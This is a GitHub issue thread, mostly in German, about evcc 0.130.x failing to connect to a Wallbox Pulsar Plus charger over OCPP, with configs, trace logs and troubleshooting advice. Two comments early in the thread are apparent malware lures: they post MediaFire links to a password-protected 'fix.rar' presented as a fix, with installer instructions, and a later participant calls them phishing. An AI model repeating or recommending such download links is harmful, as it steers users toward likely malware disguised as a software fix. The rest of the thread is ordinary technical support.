evcc-io/evcc #15707: pulsar plus und cannot create charger ... und Ladestation gesperrt

stm9x9, 2024-08-26:
### Describe the bug

Seitdem ich von der letzten 0.129.x auf 0.130.2 gewechselt bin, konnte ich die Wallbox Puslar Plus überhaupt nicht verbinden. Jetzt mit der 0.130.4 gibt es ein ein klein wenig anderes Bild aber immer noch kaputt:

Wenn ich evcc neu starte, dann steht in der Wallbox kurz OCPP verbinden ... und recht schnell OCPP verbunden. Aber in evcc sieht das ganz anders aus.

ich bekomme den Fehler

cannot create charger 'PulsarPlus': cannot create charger type 'template': cannot create charger type 'ocpp': Scheduled

und die Oberfläche sieht so aus:

[image]

und die Konfig sieht auch ganz leer aus:

[image]

Beim nächsten (also nicht regelmäßig oder abwechselnd sondern mal so mal so) startet evcc gut, dafür wechselt dann aber in der App der Status auf "Ladestation entsperren", was ich gar nicht kann, solange die wallbox im OCPP-Modus ist. In evcc steht dann jetzt auch: waiting for local authentication

Ich muß jetzt also in der Wallbox OCPP ausschalten mit Neustart. Dann kann ich die Box entsperren. Sofort fängt sie an zu laden. Ich schalte dann OCCP wieder ein, Neustart. Dann steht in der App: "Ladevorgang beendet" obwohl das Auto nocht nicht voll ist. Und da ist ein neues Symbol: Vorgang abgebrochen, Erneut verbinden.

Wenn ich dann auf Schnelladen gehe (Sonne ist nicht mehr), dann passiert nichts, Log unten.

Also so oder so, egal welcher Fehler oder auch nicht: Laden kann ich seit der 130.x nicht mehr :-/

### Steps to reproduce

1.
2.
3.
...

### Configuration details

```yaml
# open evcc at http://evcc.local:7070
network:
  schema: http
  host: evcc # .local suffix announces the hostname on MDNS
  port: 7070

log: debug
levels:
  cache: error
  ocpp: trace
  bmw: trace

# unique installation id
plant: xxx
interval: 10s # control cycle interval

tariffs:
  currency: EUR # (default EUR)
  grid:
    # static grid price
    type: fixed
    price: 0.40 # [currency]/kWh

  feedin:
    # rate for feeding excess (pv) energy to the grid
    type: fixed
    price: 0.082 # [currency]/kWh

meters:
- type: template
  template: huawei-dongle-powersensor
  id: 1
  host: Huawei-Solar
  port: 502
[... 274 lines cut ...]
[ocpp ] TRACE 2024/08/26 19:29:40 recv Garage: [3,"1444396575",{"status": "Accepted"}]
[ocpp ] TRACE 2024/08/26 19:29:40 recv Garage: [2,"917869461","MeterValues",{"meterValue": [{"timestamp": "2024-08-26T17:29:39Z","sampledValue": [{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Power.Active.Import","unit": "W","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Energy.Active.Import.Register","unit": "Wh","value": "1002261.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L1","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L2","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L3","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L1-N","measurand": "Voltage","unit": "V","value": "224.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L2-N","measurand": "Voltage","unit": "V","value": "241.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L3-N","measurand": "Voltage","unit": "V","value": "238.0"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Current.Offered","unit": "A","value": "16"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Power.Offered","unit": "W","value": "11085"} ]} ],"connectorId": 1}]
[ocpp ] TRACE 2024/08/26 19:29:40 send Garage: [3,"917869461",{}]
[lp-1 ] DEBUG 2024/08/26 19:29:42 charge power: 0W
[lp-1 ] DEBUG 2024/08/26 19:29:42 charge currents: [0 0 0]A
[lp-1 ] DEBUG 2024/08/26 19:29:42 charge voltages: [224 241 238]V
[lp-1 ] DEBUG 2024/08/26 19:29:42 detected connected phases: 3p
[lp-1 ] DEBUG 2024/08/26 19:29:42 charge total import: 1002.261kWh
[lp-1 ] DEBUG 2024/08/26 19:29:42 charger status: B
[lp-1 ] DEBUG 2024/08/26 19:29:42 plan: charge 53m6s between 2024-08-26 20:00:00 +0200 CEST until 2024-08-26 21:00:00 +0200 CEST (power: 3680W, avg cost: 0.400)
[lp-1 ] TRACE 2024/08/26 19:29:42 slot from: 2024-08-26 20:00:00 +0200 CEST to 2024-08-26 20:53:06 +0200 CEST cost 0.400
[ocpp ] TRACE 2024/08/26 19:29:49 recv Garage: [2,"310291626","Heartbeat",{}]
[ocpp ] TRACE 2024/08/26 19:29:49 send Garage: [3,"310291626",{"currentTime":"2024-08-26T17:29:49Z"}]
[ocpp ] TRACE 2024/08/26 19:29:49 send Garage: [2,"2775135726","TriggerMessage",{"requestedMessage":"MeterValues","connectorId":1}]
[ocpp ] TRACE 2024/08/26 19:29:50 recv Garage: [3,"2775135726",{"status": "Accepted"}]
[ocpp ] TRACE 2024/08/26 19:29:50 recv Garage: [2,"1528439578","MeterValues",{"meterValue": [{"timestamp": "2024-08-26T17:29:49Z","sampledValue": [{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Power.Active.Import","unit": "W","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Energy.Active.Import.Register","unit": "Wh","value": "1002261.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L1","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L2","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L3","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L1-N","measurand": "Voltage","unit": "V","value": "224.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L2-N","measurand": "Voltage","unit": "V","value": "241.0"},{"format": "Raw","location": "Outlet","context": "Trigger","phase": "L3-N","measurand": "Voltage","unit": "V","value": "238.0"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Current.Offered","unit": "A","value": "16"},{"format": "Raw","location": "Outlet","context": "Trigger","measurand": "Power.Offered","unit": "W","value": "11085"} ]} ],"connectorId": 1}]
```

### What type of operating system are you running?

Linux

### Version

evcc 0.130.4

ritiiq, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

stm9x9, 2024-08-26:
Hä!?
[image]

Chris45671, 2024-08-26:
Kannst Du in der Wallbox sagen dass Du laden ohne Authentifizierung durchführen möchtest?

stm9x9, 2024-08-26:
ich wüßte nicht wie. Eigentlich sollte ich die gar nicht sperren können, wenn sie in OCPP ist. Ich kann ja auch nicht entsperren, erst wenn ich aus dem "fremdgesteuerten" Modus rausgehe. Wenn ich im Menü zu auto-lock gehe, dann steht da: Diese Funktion ist nicht verfügbar, da die OCPP-Verwaltung aktiv ist. Bitte wenden Sie sich an den Administrator der Ladestation ...

mfuchs1984, 2024-08-26:
Die Pulsar kann kein free charge, braucht deshalb "remotestart: true" in der charger config, dann verschwindet das authorize problem.

Das Thema mit cannot create charger "scheduled" hängt wohl mit #15368 zusammen, das ab 0.130.4 dazu kam.

mohamed-elsankary, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mfuchs1984, 2024-08-26:
@andig könnt ihr die Phishing Kommentare hier löschen?

stm9x9, 2024-08-26:
jetzt hänge ich wieder in der geht gar nicht Schleife ... Wallbox sagt  OCPP verbunden, aber ecvv sagt:

[main  ] INFO 2024/08/26 20:01:54 evcc 0.130.4
[main  ] INFO 2024/08/26 20:01:54 using config file: /etc/evcc.yaml
[db    ] INFO 2024/08/26 20:01:54 using sqlite database: /root/.evcc/evcc.db
[main  ] INFO 2024/08/26 20:01:54 listening at :7070
[ocpp-1] DEBUG 2024/08/26 20:01:54 waiting for chargepoint: 5m0s
[ocpp  ] INFO 2024/08/26 20:02:41 charge point connected, registering: Garage
[ocpp  ] TRACE 2024/08/26 20:02:42 recv Garage: [2,"1448758623","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-26T18:02:41Z"}]
[ocpp  ] TRACE 2024/08/26 20:02:42 send Garage: [3,"1448758623",{}]
[ocpp  ] TRACE 2024/08/26 20:02:42 send Garage: [2,"3092711779","ChangeAvailability",{"connectorId":0,"type":"Operative"}]
[ocpp  ] TRACE 2024/08/26 20:02:42 recv Garage: [2,"1434246693","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "Finishing","timestamp": "2024-08-26T18:02:42Z"}]
[ocpp  ] TRACE 2024/08/26 20:02:42 send Garage: [3,"1434246693",{}]
[ocpp  ] TRACE 2024/08/26 20:02:43 recv Garage: [3,"3092711779",{"status": "Scheduled"}]
[main  ] FATAL 2024/08/26 20:02:43 cannot create charger 'PulsarPlus': cannot create charger type 'template': cannot create charger type 'ocpp': Scheduled
[main  ] FATAL 2024/08/26 20:02:43 will attempt restart in: 15m0s
[main  ] INFO 2024/08/26 20:02:43 new version available: 0.130.5

stm9x9, 2024-08-26:
Äh, sehe ich das richtig, daß OCPP ohne Sponsorung eh nicht funktionieren soll?

"Sponsoring erforderlich
Mit der Version 0.130 wird die OCPP-Unterstützung zu einem Feature für das ein 💚 Sponsoring erforderlich ist."

Da wäre ja ein Hinweis direkt im Programm irgendwie besser als nur in einer Blogbeitrag ...!?

Chris45671, 2024-08-26:
So wie ich es verstehe, siehst Du es richtig. 
Da ich Sponsor bin, habe ich dies nicht auf dem Schirm gehabt.

premultiply, 2024-08-26:
[ocpp ] TRACE 2024/08/26 20:02:42 recv Garage: [2,"1434246693","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "Finishing","timestamp": "2024-08-26T18:02:42Z"}]

Die Box hängt einfach nur im Status "Finishing".
Bedeutet: Transaktion beendet. Kabel abstecken.
Sonst geht es nicht weiter.

closed 2024-08-26 by premultiply

stm9x9, 2024-08-26:
> Die Box hängt einfach nur im Status "Finishing". Bedeutet: Transaktion beendet. 
Und das sollte eigentlich grundsätzlich so nicht sein, korrekt? Weil voll ist das Auto noch nicht.

> Kabel abstecken. Sonst geht es nicht weiter.

Dazu muß ich vermutlich runter in die Garage? Ein Neustart der Wallbox aus der App reicht nicht? Dann werde ich das gleich mal machen müssen.
 
> `remotestart: true` konfigurieren. evcc neustarten.

schon passiert:

chargers:
- type: template
  template: pulsarplus
  name: PulsarPlus
  remotestart: true

 
> Ab 0.130.5 steigt auch bei `ChangeAvailability` die Initialisierung nicht mehr direkt sondern es wird selbst im Fehlerfall nur noch eine Debug-Meldung ausgegeben - wie bei allen anderen Initialisierungen auch.
> 
> Dieses Problem sollte damit eigentlich behoben sein. Ich mache daher hier mal zu.

ich habe die .5 jetzt drauf und in der Tat läuft es im Logfile jetzt weiter:

```
[main  ] INFO 2024/08/26 20:41:05 evcc 0.130.5
[main  ] INFO 2024/08/26 20:41:05 using config file: /etc/evcc.yaml
[db    ] INFO 2024/08/26 20:41:05 using sqlite database: /root/.evcc/evcc.db
[main  ] INFO 2024/08/26 20:41:05 listening at :7070
[ocpp-1] DEBUG 2024/08/26 20:41:05 waiting for chargepoint: 5m0s
[ocpp  ] INFO 2024/08/26 20:42:09 charge point connected, registering: Garage
[ocpp  ] TRACE 2024/08/26 20:42:09 recv Garage: [2,"1086665555","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-26T18:42:08Z"}]
[ocpp  ] TRACE 2024/08/26 20:42:09 send Garage: [3,"1086665555",{}]
[ocpp  ] TRACE 2024/08/26 20:42:09 recv Garage: [2,"1314843118","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "Finishing","timestamp": "2024-08-26T18:42:08Z"}]
[ocpp  ] TRACE 2024/08/26 20:42:09 send Garage: [3,"1314843118",{}]
[ocpp  ] TRACE 2024/08/26 20:42:10 send Garage: [2,"2412272945","ChangeAvailability",{"connectorId":0,"type":"Operative"}]
[ocpp  ] TRACE 2024/08/26 20:42:10 recv Garage: [3,"2412272945",{"status": "Scheduled"}]
[ocpp-1] DEBUG 2024/08/26 20:42:10 failed configuring availability: Scheduled
[ocpp  ] TRACE 2024/08/26 20:42:10 send Garage: [2,"2641771155","GetConfiguration",{}]
[main  ] FATAL 2024/08/26 20:43:10 cannot create charger 'PulsarPlus': cannot create charger type 'template': cannot create charger type 'ocpp': ocpp message (2641771155): GenericError - Request timed out
[main  ] FATAL 2024/08/26 20:43:10 will attempt restart in: 15m0s
[ocpp  ] DEBUG 2024/08/26 20:43:40 charge point disconnected: Garage
[ocpp  ] DEBUG 2024/08/26 20:43:50 charge point connected: Garage
[ocpp  ] TRACE 2024/08/26 20:43:50 recv Garage: [2,"582639811","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-26T18:43:49Z"}]
[ocpp  ] TRACE 2024/08/26 20:43:50 send Garage: [3,"582639811",{}]
[ocpp  ] TRACE 2024/08/26 20:43:50 recv Garage: [2,"2102020689","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "Finishing","timestamp": "2024-08-26T18:43:49Z"}]
[ocpp  ] TRACE 2024/08/26 20:43:50 send Garage: [3,"2102020689",{}]
[ocpp  ] TRACE 2024/08/26 20:44:09 recv Garage: [2,"100093524","Heartbeat",{}]
```

aber es bleibt bei:

[image]

aber nach zwei weiteren Neustarts:

```
[main ] INFO 2024/08/26 20:49:18 evcc 0.130.5
[main ] INFO 2024/08/26 20:49:18 using config file: /etc/evcc.yaml
[db ] INFO 2024/08/26 20:49:18 using sqlite database: /root/.evcc/evcc.db
[main ] INFO 2024/08/26 20:49:18 listening at :7070
[ocpp-1] DEBUG 2024/08/26 20:49:18 waiting for chargepoint: 5m0s
[ocpp ] INFO 2024/08/26 20:49:39 charge point connected, registering: Garage
[ocpp-1] DEBUG 2024/08/26 20:49:40 failed configuring availability: Scheduled
[lp-1 ] DEBUG 2024/08/26 20:49:43 charge total import: 1002.261kWh
[site ] WARN 2024/08/26 20:49:43 battery configured but residualPower is missing or <= 0 (add residualPower: 100 to site), see https://docs.evcc.io/en/docs/reference/configuration/site#residualpower
[site ] INFO 2024/08/26 20:49:43 site config:
[site ] INFO 2024/08/26 20:49:43 meters: grid ✓ pv ✓ battery ✓
[site ] INFO 2024/08/26 20:49:43 grid: power ✓ energy ✓ currents ✓
[site ] INFO 2024/08/26 20:49:43 pv 1: power ✓ energy ✓ currents ✗
[... 12 lines cut ...]
[site ] DEBUG 2024/08/26 20:49:43 set battery discharge control: false
[lp-1 ] DEBUG 2024/08/26 20:49:43 phase timer inactive
[lp-1 ] DEBUG 2024/08/26 20:49:43 pv timer inactive
[lp-1 ] INFO 2024/08/26 20:49:43 vehicle updated: unknown -> BMW
[lp-1 ] DEBUG 2024/08/26 20:49:43 set charge mode: pv
[lp-1 ] DEBUG 2024/08/26 20:49:44 max charge current: 6A
[site ] WARN 2024/08/26 20:49:44 interval <30s can lead to unexpected behavior, see https://docs.evcc.io/docs/reference/configuration/interval
[site ] DEBUG 2024/08/26 20:49:44 ----
[lp-1 ] DEBUG 2024/08/26 20:49:44 charge power: 0W
[lp-1 ] DEBUG 2024/08/26 20:49:44 charge currents: [0 0 0]A
[site ] DEBUG 2024/08/26 20:49:46 pv power: 0W
[site ] DEBUG 2024/08/26 20:49:46 battery soc: 83%
[site ] DEBUG 2024/08/26 20:49:46 battery power: 1051W
[site ] DEBUG 2024/08/26 20:49:46 grid meter: 43W
[site ] DEBUG 2024/08/26 20:49:46 grid currents: [1.42 1.27 -1.23]A
[site ] DEBUG 2024/08/26 20:49:46 site power: 1094W
[... cut ...]
[lp-1 ] DEBUG 2024/08/26 20:49:46 charge voltages: [226 242 239]V
[lp-1 ] DEBUG 2024/08/26 20:49:46 detected connected phases: 3p
[lp-1 ] DEBUG 2024/08/26 20:49:46 charge total import: 1002.261kWh
[lp-1 ] DEBUG 2024/08/26 20:49:46 charger status: B
[lp-1 ] DEBUG 2024/08/26 20:49:46 charge start energy: 1e+03kWh
[lp-1 ] INFO 2024/08/26 20:49:46 car connected
```
nur laden tut er nicht, aber dafür gehe ich dann gleich mal in die Garage, Stecker neu stecken. Ich versteh nur nicht, warum es nach einem Neustart mal so und mal so aussieht.

premultiply, 2024-08-26:
> Dazu muß ich vermutlich runter in die Garage? Ein Neustart der Wallbox aus der App reicht nicht? Dann werde ich das gleich mal machen müssen.

Ja. Das ist der OCPP-Logik mit den Transaktionen geschuldet (öffentliche Ladestationen...) sowie vermutlich der nur geringfügigen Konfigurierbarkeit der Box selbst hinsichtlich des genauen Verhaltens in bestimmten Situationen.

Deine Box merkt nach einen Neustart nur: Mist, ich habe alles vergessen aber huch, da steckt ja ein Stecker drin. Damit kann ich aber mal gar nichts anfangen. Ich kenne keine gültige Transaktion dazu. Also muss der "Belagerer" erstmal weichen und bis dahin mache ich jetzt sicherheitshalber einfach nichts mehr. Nicht das da einer einfach so Strom bekommen könnte! Wäre ja noch schöner.

Bei manchen Wallboxen kann man konfigurieren, dass diese sich die letzte Transaktion merken und diese auch noch einem Stromausfall wieder reibungslos fortsetzen. Das geht bei deiner Box aber offensichtlich nicht?

stm9x9, 2024-08-26:
:-D

Nein, das geht da wohl nicht. Aber in der Tat, nach dem Neustecken läuft erstmal alles :-D Wobei, irgendwie muß die Box dann aber sehr verquert denken. Denn wenn ich OCPP abschalte, dann konnte ich in der App ja das Laden aktivieren. OCPP wieder an und schwups ... nix ging mehr ...

Jetzt muß ich nur mal beobachten, ob das wieder passiert, daß nach einem evcc-Neustart dieser Fehler beim Starten wieder kommt. Danke erstmal soweit.

typxxi, 2024-08-27:
Du wirst auch wie alle anderen die Pulsar Plus Firmware 6.4.19 benötigen, bis wieder alles normal läuft.

Erst mit der Version, die aktuell noch nicht alle - besser nur ein paar wenige - kriegen, sind die Probleme weg, also schreib an den Hersteller, dass Du die Firmware brauchst, nur so wird sich was tun, denn in dem Beitrag hier hat mrhund klar geschrieben, dass er keinen der besagten Fehler, die von 130.x kommen sollen, bei seiner Pulsar Plus hat mit besagter 6.4.19

https://github.com/evcc-io/evcc/issues/15581#issuecomment-2311590024

Also füll das Wallbox Formular mit copy & paste aus und erbitte das Update von Wallbox.

stm9x9, 2024-08-27:
Das mit der Firmware gucke ich mir gleich an. Solange noch, ich habe eben auf die .6 geupdatet, was natürlich mit einem Neustart einherging: und wieder ist das UI "leer". und irgendwas klappt da nicht, diesmal neu mit "failed configuring availability: timeout" und "cannot create charger 'PulsarPlus': cannot create charger type 'template': cannot create charger type 'ocpp': ocpp message (): GenericError - client disconnected, no response received from client". "Soll" das so sein?

```
[main  ] INFO 2024/08/27 21:50:12 evcc 0.130.6
[main  ] INFO 2024/08/27 21:50:12 using config file: /etc/evcc.yaml
[db    ] INFO 2024/08/27 21:50:12 using sqlite database: /root/.evcc/evcc.db
[main  ] INFO 2024/08/27 21:50:13 listening at :7070
[ocpp-1] DEBUG 2024/08/27 21:50:13 waiting for chargepoint: 5m0s
[ocpp  ] INFO 2024/08/27 21:50:22 charge point connected, registering: Garage
[ocpp  ] TRACE 2024/08/27 21:50:22 recv Garage: [2,"1195379965","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-27T19:50:21Z"}]
[ocpp  ] TRACE 2024/08/27 21:50:22 send Garage: [3,"1195379965",{}]
[ocpp  ] TRACE 2024/08/27 21:50:22 recv Garage: [2,"613272498","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "SuspendedEVSE","timestamp": "2024-08-27T19:50:21Z"}]
[ocpp  ] TRACE 2024/08/27 21:50:22 send Garage: [3,"613272498",{}]
[ocpp  ] TRACE 2024/08/27 21:50:23 send Garage: [2,"1662027405","ChangeAvailability",{"connectorId":0,"type":"Operative"}]
[ocpp-1] DEBUG 2024/08/27 21:50:53 failed configuring availability: timeout
[ocpp  ] TRACE 2024/08/27 21:51:23 send Garage: [2,"2439289452","GetConfiguration",{}]
[ocpp  ] DEBUG 2024/08/27 21:51:52 charge point disconnected: Garage
[main  ] FATAL 2024/08/27 21:51:52 cannot create charger 'PulsarPlus': cannot create charger type 'template': cannot create charger type 'ocpp': ocpp message (): GenericError - client disconnected, no response received from client
[main  ] FATAL 2024/08/27 21:51:52 will attempt restart in: 15m0s
[ocpp  ] DEBUG 2024/08/27 21:53:26 charge point connected: Garage
[ocpp  ] TRACE 2024/08/27 21:53:26 recv Garage: [2,"1872522868","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-27T19:53:25Z"}]
[ocpp  ] TRACE 2024/08/27 21:53:26 send Garage: [3,"1872522868",{}]
[ocpp  ] TRACE 2024/08/27 21:53:26 recv Garage: [2,"920419185","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "SuspendedEVSE","timestamp": "2024-08-27T19:53:25Z"}]
[ocpp  ] TRACE 2024/08/27 21:53:26 send Garage: [3,"920419185",{}]
[ocpp  ] DEBUG 2024/08/27 21:54:56 charge point disconnected: Garage
[ocpp  ] DEBUG 2024/08/27 21:55:06 charge point connected: Garage
[ocpp  ] TRACE 2024/08/27 21:55:06 recv Garage: [2,"812071394","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 0,"errorCode": "NoError","status": "Available","timestamp": "2024-08-27T19:55:06Z"}]
[ocpp  ] TRACE 2024/08/27 21:55:06 send Garage: [3,"812071394",{}]
[ocpp  ] TRACE 2024/08/27 21:55:06 recv Garage: [2,"1219489954","StatusNotification",{"info": "","vendorId": "com.wallbox","vendorErrorCode": "","connectorId": 1,"errorCode": "NoError","status": "SuspendedEVSE","timestamp": "2024-08-27T19:55:06Z"}]
[ocpp  ] TRACE 2024/08/27 21:55:06 send Garage: [3,"1219489954",{}]
[ocpp  ] TRACE 2024/08/27 21:55:07 recv Garage: [2,"461484825","MeterValues",{"meterValue": [{"timestamp": "2024-08-27T19:55:06Z","sampledValue": [{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Power.Active.Import","unit": "W","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Energy.Active.Import.Register","unit": "Wh","value": "1008118.9"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L1","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L2","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L3","measurand": "Current.Import","unit": "A","value": "0.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L1-N","measurand": "Voltage","unit": "V","value": "225.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L2-N","measurand": "Voltage","unit": "V","value": "240.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L3-N","measurand": "Voltage","unit": "V","value": "238.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Current.Offered","unit": "A","value": "0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Power.Offered","unit": "W","value": "0"} ]} ],"connectorId": 1,"transactionId": 4}]
[ocpp-1] DEBUG 2024/08/27 21:55:07 hijacking transaction: 4
[ocpp  ] TRACE 2024/08/27 21:55:07 send Garage: [3,"461484825",{}]
[ocpp  ] TRACE 2024/08/27 21:55:07 recv Garage: [2,"355776439","MeterValues",{"meterValue": [{"timestamp": "2024-08-27T19:08:48Z","sampledValue": [{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measur [... cut ...] .0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","phase": "L3-N","measurand": "Voltage","unit": "V","value": "240.0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Current.Offered","unit": "A","value": "0"},{"format": "Raw","location": "Outlet","context": "Sample.Periodic","measurand": "Power.Offered","unit": "W","value": "0"} ]} ],"connectorId": 1,"transactionId": 4}]
[ocpp  ] TRACE 2024/08/27 21:55:10 send Garage: [3,"324812541",{}]
```

stm9x9, 2024-08-27:
Ok ... ich habe die v.6.4.14 laut der App. Werde mich also an Wallbox.com wenden.

flepp4ever, 2024-08-28:
Bei mir sieht die evcc.yaml so aus und ich kann mit der 0.130.6 auch laden:

> type: template
> template: pulsarplus
> timeout: 5m
> name: wallbox5
> stationid: XXXXX
> remotestart: true

--> Stationid ist die fünfstellige Seriennummer der Wallbox.

stm9x9, 2024-08-28:
keine dolle Antwort bekommen:

vielen Dank, dass Sie sich an den Wallbox-Kundensupport gewandt haben. Wir schätzen Ihre Geduld, während wir daran arbeiten, Ihre Anfrage zu lösen.

Ich möchte Ihnen mitteilen, dass ich Ihre Anliegen mit unserem Produktteam besprochen habe und sie bestätigt haben, dass ein Update (Version 6.4.19) bald veröffentlicht wird. Allerdings haben wir derzeit noch kein genaues Veröffentlichungsdatum oder einen Zeitrahmen.

Sollten Sie weiterhin Probleme mit Ihrer aktuellen Version haben, können Sie vorübergehend zur vorherigen Version im EVCC (0.129x) zurückkehren.

Wir danken Ihnen für Ihr Verständnis und stehen Ihnen weiterhin zur Verfügung, um Sie bei diesem Prozess zu unterstützen.

typxxi, 2024-08-28:
> Sollten Sie weiterhin Probleme mit Ihrer aktuellen Version haben, können Sie vorübergehend zur vorherigen Version im EVCC (0.129x) zurückkehren.
> 
> Wir danken Ihnen für Ihr Verständnis und stehen Ihnen weiterhin zur Verfügung, um Sie bei diesem Prozess zu unterstützen.

Na dann wachen die Wallbox Mitarbeiter mittlerweile auf und lesen hier mit, denn woher sonst wissen sie, dass man mit 0.129.0 die Probleme von 130.6 vermeiden kann.

Es tut sich was.

Aber Dir wurde ja eine noch neuere Version in Aussicht gestellt wurde, also jenseits 6.4.14, die ja den Vollgasfehler haben soll, dass nur schnell geladen wird. Wir haängen noch bei 5.17 was auch immer und hoffen wirklich auf ein bald für uns eine 6.4 zu bekommen.